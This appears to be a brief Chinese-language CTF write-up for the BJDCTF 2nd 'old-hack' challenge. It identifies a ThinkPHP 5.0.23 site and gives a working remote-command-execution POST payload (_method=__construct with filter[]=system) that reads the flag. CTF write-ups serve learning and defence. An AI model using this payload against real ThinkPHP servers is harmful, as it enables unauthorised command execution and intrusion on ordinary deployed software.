BJDCTF-2nd-old-hack

发表于2021-03-20更新于2021-03-20阅读次数

1. 首页

可以看到系统提示为thinkphp5漏洞

2. 查看系统版本

1
?s=1

看到版本号为5.0.23,搜索一波5.0.23漏洞
ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析

3. 远程命令执行漏洞

1
2
POST格式提交:
_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

参考:
https://www.freebuf.com/vuls/194105.html

https://blog.csdn.net/wuxianbing2012/article/details/104897634